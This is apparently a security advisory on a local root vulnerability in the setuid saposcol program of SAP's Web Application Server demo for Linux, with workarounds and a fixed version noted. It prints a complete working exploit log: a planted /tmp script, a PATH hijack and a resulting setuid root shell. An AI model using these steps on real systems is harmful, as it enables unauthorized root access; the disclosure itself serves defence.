

    - SAP R/3 The Web  Application Server for Linux as  distributed on
      CD at the CeBit fair
    - The saposcol version 1.4 dated 2001-03-22


    Jochen Hein found following.  The Web Application Server demo  for
    Linux contains the program saposcol  that is setuid root.   Due to
    improper usage of popen(3) it  may be possible for local  users to
    gain unauthorized root access.

    Below is a complete log of a successful root eploit.

        user@jupiter:~$ cat /tmp/expand
        cp /usr/bin/ksh /tmp/.sh
        chmod 4755 /tmp/.sh
        echo "done" > /tmp/blubber
        user@jupiter:~$ ls -l /tmp/.sh /tmp/blubber
        ls: /tmp/.sh: No such file or directory
        ls: /tmp/blubber: No such file or directory
        user@jupiter:~$ export PATH=/tmp:$PATH
        user@jupiter:~$ /usr/sap/WAS/SYS/exe/run/saposcol
        Starting collector (create new process)
        user@jupiter:~$ ls -l /tmp/.sh /tmp/blubber
        -rwsr-xr-x 1 root sapdb   162448   Apr 9 21:00 /tmp/.sh
        -rw-r--r-- 1 root sapdb        5   Apr 9 21:00 /tmp/blubber

    Local  users  may  gain   unauthorized  root  access.   The   path
    /usr/sap/WAS/SYS/exe/run is not protected with file permissions as
    well as saposcol itself (this is also documented in SAP's security

    Since the Web Application Server Demo may be installed on  systems
    with local users that may even allow dial up access, it is a  real


    Workaround  is  to  remove  the  setuid-bit  from saposcol as show

        root# chmod u-s /usr/sap/WAS/SYS/exe/run/saposcol

    This may affect some functions of the Web Application Server.

    If you trust your wasadm user as well as all SAP R/3 users on your
    system, you may only want to restrict saposcol to the group  sapdb
    and leave the setuid-bit intact.

        root# chgrp sapdb /usr/sap/WAS/SYS/exe/run/saposcol
        root# chmod a-rx /usr/sap/WAS/SYS/exe/run/saposcol

    The version 1.5 of the saposcol program fixes this  vulnerability.
    It is available from:

        * sapserv*  in  /general/misc/linuxlab/saptools  -  you   need
          access to SAP OSS.
        * in /pub/linuxlab/saptools